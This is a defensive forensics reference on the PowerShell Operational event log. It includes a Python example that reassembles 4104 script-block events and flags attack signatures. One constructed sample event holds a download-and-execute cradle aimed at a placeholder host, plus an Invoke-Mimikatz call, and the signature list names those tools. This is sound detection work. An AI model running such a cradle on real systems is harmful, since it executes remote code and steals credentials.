PowerShell/Operational.evtx
C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx
PowerShell is the weapon of choice for post-exploitation - it is built in, trusted by the OS and capable of nearly anything. Microsoft responded by introducing Script Block Logging, which captures the full decoded content of every script block as the runtime processes it. Even heavily obfuscated payloads are recorded in their deobfuscated form, making this log nightmare fuel for attackers who rely on PowerShell for stealth.
Microsoft-Windows-PowerShell/Operational - written by the PowerShell engine (AMSI-integrated)
General
The PowerShell Operational log is written by the Windows PowerShell engine. When Script Block Logging is enabled, it records the full text of every script block at the point of compilation, before execution. This sits alongside the engine's Antimalware Scan Interface (AMSI) integration, so even if an attacker bypasses AMSI, the script content has already been written to the event log. Large scripts are split across multiple 4104 events that carry a sequence number (MessageNumber of MessageTotal), so reconstruction requires aggregating all fragments of the same script block. The log is an essential complement to Security Event 4688 (process creation): 4688 gives only the command line, while this log provides the actual script content.
Traces
The most forensically significant Event IDs in the PowerShell Operational log are:
| Event ID | Description |
|---|---|
| 4100 | Error record from the PowerShell engine. Contains error messages, stack traces and the context in which a failure occurred. |
| 4103 | Module Logging. Shows the PowerShell pipeline execution context including the command name, parameters and user identity. |
| 4104 | Script Block Logging. Records the full decoded content of the executed script block. Large scripts are split across multiple events with a MessageNumber/MessageTotal field for reassembly. |
| 53504 | PowerShell remoting session established. Indicates that a remote session (WinRM) was initiated - a common lateral movement vector. |
Forensic Value
- Recover obfuscated payloads: Event ID 4104 captures the deobfuscated script block the runtime compiled - meaning Base64-encoded, string-concatenated or character-substitution obfuscation is transparently unwound before logging.
- Attribute in-memory execution: Fileless attacks that download and execute payloads entirely in memory leave no file on disk but leave the full script content in the PowerShell Operational log.
- Detect common attack frameworks: Strings from Cobalt Strike, Empire, PowerSploit and Mimikatz appear verbatim in 4104 events, allowing direct signature-based detection even without EDR.
- Identify lateral movement via remoting: Event 53504 tied to a specific source IP and user account provides a concrete record of PowerShell-based remote execution across hosts.
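As an added example (not code from the original page), the Python below does the two things the General section and the Forensic Value list above call for: it reassembles fragmented 4104 records from event XML in MessageNumber order, flags blocks with missing fragments, scans the reassembled text for a few tool strings, and decodes the -EncodedCommand argument that a 4688 command line exposes. The event XML, the ScriptBlockId values, the signature list and the 4688 command line are all constructed for the example; the field names follow the MessageNumber/MessageTotal/ScriptBlockText/ScriptBlockId layout of real 4104 events, and the Computer name, URL and GUIDs are placeholders. Reading .evtx files directly is out of scope; feed it the XML that `(Get-WinEvent ...).ToXml()` or an evtx parser emits.

```python
"""Reassemble fragmented 4104 script-block events, scan the reassembled text
for tool strings, and decode the -EncodedCommand argument of a 4688 line.

Added example, not code from the original page. The event XML is constructed
to mirror the EventData layout of real 4104 records; it does not read .evtx.
"""
import base64
import re
import xml.etree.ElementTree as ET
from collections import defaultdict
from xml.sax.saxutils import escape

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Illustrative signature list (an assumption, not a vendor rule set). Matching
# runs on the reassembled block, so a string split across fragments still hits.
SIGNATURES = {
    "download cradle": re.compile(r"DownloadString\s*\(", re.I),
    "Mimikatz wrapper": re.compile(r"Invoke-Mimikatz", re.I),
    "nested base64": re.compile(r"FromBase64String\s*\(", re.I),
}


def _event(sbid, num, total, text, event_id=4104):
    """Build one constructed event in the Windows event XML schema."""
    return (
        f'<Event xmlns="{NS["e"]}"><System>'
        '<Provider Name="Microsoft-Windows-PowerShell"/>'
        f"<EventID>{event_id}</EventID><Computer>WS01</Computer></System>"
        "<EventData>"
        f'<Data Name="MessageNumber">{num}</Data>'
        f'<Data Name="MessageTotal">{total}</Data>'
        f'<Data Name="ScriptBlockText">{escape(text)}</Data>'
        f'<Data Name="ScriptBlockId">{sbid}</Data>'
        '<Data Name="Path"></Data></EventData></Event>'
    )


BLOCK_A = "11111111-aaaa-4bbb-8ccc-000000000001"  # constructed ScriptBlockIds
BLOCK_B = "22222222-aaaa-4bbb-8ccc-000000000002"
SAMPLE_EVENTS = [
    # Block A: two fragments, delivered out of order; the tool name straddles
    # the fragment boundary, which is exactly what per-event matching misses.
    _event(BLOCK_A, 2, 2, "katz; Write-Output done"),
    _event(BLOCK_A, 1, 2, "IEX (New-Object Net.WebClient).DownloadString("
                          "'http://example.invalid/a.ps1'); Invoke-Mimi"),
    # Block B: MessageTotal is 3 but fragment 2 was lost (rolled log or a gap
    # in collection), so whatever it held cannot be matched and must be flagged.
    _event(BLOCK_B, 1, 3, "$p = [Convert]::"),
    _event(BLOCK_B, 3, 3, "; IEX $p"),
    # A 4100 error record that the parser must ignore.
    _event("00000000-0000-4000-8000-000000000000", 1, 1, "error text", 4100),
]
# Constructed 4688 command line; the payload is "Get-Process" as UTF-16LE/base64.
SAMPLE_4688_CMDLINE = ("powershell.exe -NoP -W Hidden "
                       "-enc RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==")


def parse_4104(xml_text):
    """Return the EventData fields of one 4104 event, or None for other IDs."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4104":
        return None
    data = {d.get("Name"): (d.text or "")
            for d in root.findall("e:EventData/e:Data", NS)}
    return {"id": data["ScriptBlockId"], "num": int(data["MessageNumber"]),
            "total": int(data["MessageTotal"]), "text": data["ScriptBlockText"]}


def reassemble(events):
    """Join fragments per ScriptBlockId in MessageNumber order.

    Returns {ScriptBlockId: {"text", "complete", "missing"}}. Incomplete blocks
    are kept, with the gap recorded, so partial evidence is not discarded.
    """
    parts, totals = defaultdict(dict), {}
    for ev in events:
        if ev is None:
            continue
        parts[ev["id"]][ev["num"]] = ev["text"]
        totals[ev["id"]] = ev["total"]
    result = {}
    for sbid, frags in parts.items():
        missing = [n for n in range(1, totals[sbid] + 1) if n not in frags]
        result[sbid] = {"text": "".join(frags[n] for n in sorted(frags)),
                        "complete": not missing, "missing": missing}
    return result


def scan(blocks):
    """Return {ScriptBlockId: [matched signature names]} for blocks that hit."""
    hits = {}
    for sbid, blk in blocks.items():
        names = [n for n, rx in SIGNATURES.items() if rx.search(blk["text"])]
        if names:
            hits[sbid] = names
    return hits


def decode_encoded_command(cmdline):
    """Decode -EncodedCommand (base64 of UTF-16LE text) from a 4688 command line.

    PowerShell accepts any unambiguous prefix of the switch; the common
    spellings -e, -ec, -enc and -encodedcommand are covered here."""
    m = re.search(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)",
                  cmdline, re.I)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


if __name__ == "__main__":
    blocks = reassemble(parse_4104(x) for x in SAMPLE_EVENTS)
    for sbid, blk in blocks.items():
        status = "complete" if blk["complete"] else f"missing {blk['missing']}"
        print(f"{sbid} ({status}): {blk['text']}")
    print("hits:", scan(blocks))
    print("4688 decoded:", decode_encoded_command(SAMPLE_4688_CMDLINE))
```

Two points worth keeping in mind when applying this to real data. First, 4104 shows the block as the engine compiled it, one event per layer: a script that decodes a string and passes it to Invoke-Expression produces one event for the decoding wrapper and a later one for the decoded payload, so the readable content is usually in the last block of a chain rather than the first. Second, full Script Block Logging only exists when the EnableScriptBlockLogging policy is turned on; without it, PowerShell 5 and later still logs blocks it considers suspicious, but at Warning level and for that subset only, so an absence of 4104 events is not evidence that nothing ran.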